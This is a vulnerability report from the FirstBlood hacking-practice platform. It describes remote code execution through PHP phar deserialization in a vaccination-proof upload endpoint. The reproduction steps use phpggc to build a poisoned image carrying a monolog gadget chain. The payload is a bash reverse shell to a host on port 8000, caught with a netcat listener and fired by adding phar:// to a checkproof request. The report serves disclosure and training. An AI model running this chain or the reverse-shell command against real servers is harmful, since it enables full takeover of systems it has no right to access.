FirstBlood-#728 — Remote Command Execution via deserialization by uploading phar file
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-27, neolex Level 2 reported:
This is possible for an attacker to get remote code execution by uploading a phar file via the https://792406c141d1-neolex.a.firstbloodhackers.com/vaccination-manager/pub/submit-vaccination-proof.php endpoint. and then trigger the deserialization and get RCE using a
Step to reproduce
clone the following repository https://github.com/ambionics/phpggc and go inside the directory
run the following command :
./phpggc -pj /tmp/dummy.jpg -o /tmp/z.zip.phar monolog/rce4 "bash -i >& /dev/tcp/neolex.dev/8000 0>&1"
dummy.jpgany valid jpg file , and replacing neolex.dev by your domain or ip
listen on port 8000 inside you server via
nc -lnvp 8000
Upload the following image (
/tmp/z.zip.phar) inside https://792406c141d1-neolex.a.firstbloodhackers.com/vaccination-manager/pub/upload-vaccination-proof.php
look inside the burp proxy the request made to
/api/checkproof.phpfor exemple in my case the request is for the url : https://792406c141d1-neolex.a.firstbloodhackers.com/api/checkproof.php?proof=/app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg
send this request to repeater and add
phar://before the path and send the request
You should have a reverse shell inside your netcat listener
Remote code execution, An attacker can completely takover the server and run a bash shell inside.
FirstBlood ID: 34
Vulnerability Type: Deserialization
This endpoint calls filesize() on the path provided in the 'proof' param with no filtering or sanitisation. By adding the phar:// stream handler to the path, an attacker can force a previously uploaded file to be sent through deserialisation. Coupled with the fact that a gadget-chain vulnerable version of monolog is being used, this allows for RCE.